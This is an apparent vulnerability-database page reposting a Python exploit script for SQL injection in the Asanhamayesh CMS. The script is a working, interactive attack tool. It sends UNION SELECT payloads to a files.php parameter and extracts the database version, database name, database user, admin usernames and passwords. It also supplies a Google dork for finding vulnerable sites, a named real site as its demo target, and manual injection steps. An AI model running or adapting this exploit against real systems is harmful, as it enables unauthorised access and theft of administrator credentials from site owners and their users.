Asanhamayesh CMS | SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1703752 漏洞类型
发布时间 2019-08-15 更新时间 2019-08-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080058
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/python3
###########################################################################
#                          IN The Name OF God        
###########################################################################
# Title: Asanhamayesh CMS | SQL Injection
# Date: 2019-07-23                                     
# Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)                                     
# Exploit Author: Blue Tigers
# Vendor Homepage: http://asanhamayesh.com     
# Tested on: GNU/Linux , Windows , FreeBsd , Android   
# CWE : CVE-89      
###########################################################################
# We Are : D3tect0r (AMJ) & Invisible rabbit(Mahdis) & K0uR0sH3R
###########################################################################
# Demo : http://www.med-sci.kau.ac.ir
###########################################################################
import requests
from bs4 import BeautifulSoup
import sys
print ('''\033[31m  
 █████╗ ███████╗ █████╗ ███╗   ██╗██╗  ██╗ █████╗ ███╗   ███╗ █████╗ ██╗   ██╗███████╗███████╗██╗  ██╗
██╔══██╗██╔════╝██╔══██╗████╗  ██║██║  ██║██╔══██╗████╗ ████║██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██║  ██║
███████║███████╗███████║██╔██╗ ██║███████║███████║██╔████╔██║███████║ ╚████╔╝ █████╗  ███████╗███████║
██╔══██║╚════██║██╔══██║██║╚██╗██║██╔══██║██╔══██║██║╚██╔╝██║██╔══██║  ╚██╔╝  ██╔══╝  ╚════██║██╔══██║
██║  ██║███████║██║  ██║██║ ╚████║██║  ██║██║  ██║██║ ╚═╝ ██║██║  ██║   ██║   ███████╗███████║██║  ██║
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝
        \033[32m
         ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
        ▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌
        ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ 
        ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌          
        ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ 
        ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌
        ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌
        ▐░▌          ▐░▌       ▐░▌          ▐░▌
        ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
        ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
        ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀ 
                                       
        \033[33m
▓█████ ▒██   ██▒ ██▓███   ██▓     ▒█████   ██▓▄▄▄█████▓
▓█   ▀ ▒▒ █ █ ▒░▓██░  ██▒▓██▒    ▒██▒  ██▒▓██▒▓  ██▒ ▓▒
▒███   ░░  █   ░▓██░ ██▓▒▒██░    ▒██░  ██▒▒██▒▒ ▓██░ ▒░
▒▓█  ▄  ░ █ █ ▒ ▒██▄█▓▒ ▒▒██░    ▒██   ██░░██░░ ▓██▓ ░ 
░▒████▒▒██▒ ▒██▒▒██▒ ░  ░░██████▒░ ████▓▒░░██░  ▒██▒ ░ 
░░ ▒░ ░▒▒ ░ ░▓ ░▒▓▒░ ░  ░░ ▒░▓  ░░ ▒░▒░▒░ ░▓    ▒ ░░   
 ░ ░  ░░░   ░▒ ░░▒ ░     ░ ░ ▒  ░  ░ ▒ ▒░  ▒ ░    ░    
   ░    ░    ░  ░░         ░ ░   ░ ░ ░ ▒   ▒ ░  ░      
   ░  ░ ░    ░               ░  ░    ░ ░   ░           
Created By Fri3nds Team
''')
def print_usage():
    print ("usage : python Exploit.py http://site.com/")
if len(sys.argv) < 2:
    print_usage()
    sys.exit(1)

url = sys.argv[1]
vuln = "/fa/files.php?id=-555"
ufv = url+vuln
pname = "asanhamayesh.com"

z = requests.get(ufv)
if pname in z.text:
    print ("Connected!")
    print ("Enter 'Help' to Show Commands ")
    while True:
        opt = input ('\033[31m[root@asanhamayesh Exploit]# ')
        if opt == 'help' :
            print ('''
            version     Show version of database
            database    Show Databasee name
            userdb      Show Database user 
            usernames   Show Usernames of CMS
            passwords   Show Passwords of CMS
            userpass    Show Usernames with Passwords [Ex:User:password]
            dontwork    If this Exploit failed to exploit the target, enter this command
            exit        Exit From Exploit
            ''')
        if opt == 'version':
            try:
                payload = "+union+select+1,2,version(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print ('\033[92m' ,i)
            except:
                payload = "+union+select+1,2,version(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'database':

            try:
                payload = "+union+select+1,2,database(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print ('\033[92m',i)
            except:
                payload = "+union+select+1,2,database(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'userdb':
            try:
                payload = "+union+select+1,2,user(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print ('\033[92m',i)
            except:
                payload = "+union+select+1,2,user(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'usernames':
            try:
                payload = "+union+select+1,2,unhex(hex(group_concat(username))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print('\033[92m',i)
            except:
                payload = "+union+select+1,2,unhex(hex(group_concat(username))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'passwords':
            try:
                payload = "+union+select+1,2,unhex(hex(group_concat(password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print (i)
            except:
                payload = "+union+select+1,2,unhex(hex(group_concat(password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'userpass':
            try:
                payload = "+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print('\033[92m',i)
            except:
                payload = "+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'dontwork':
            print ('''\033[92m
            Well you can manually infiltrate your target
            To do this, place the bottom URL in front of the site address and manually inject the commands.
            /fa/files.php?id=-555
            In all sites the number of columns is equal to 6 and the vulnerable column is number 3.
            EX: site.com/fa/files.php?id=-555+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+
            ''')
        elif opt == 'exit':
            sys.exit()
        else:
            print ("EXP:",opt,"Command Not Found")
else:
    print ("Exploit is not Support From This Target")
    sys.exit()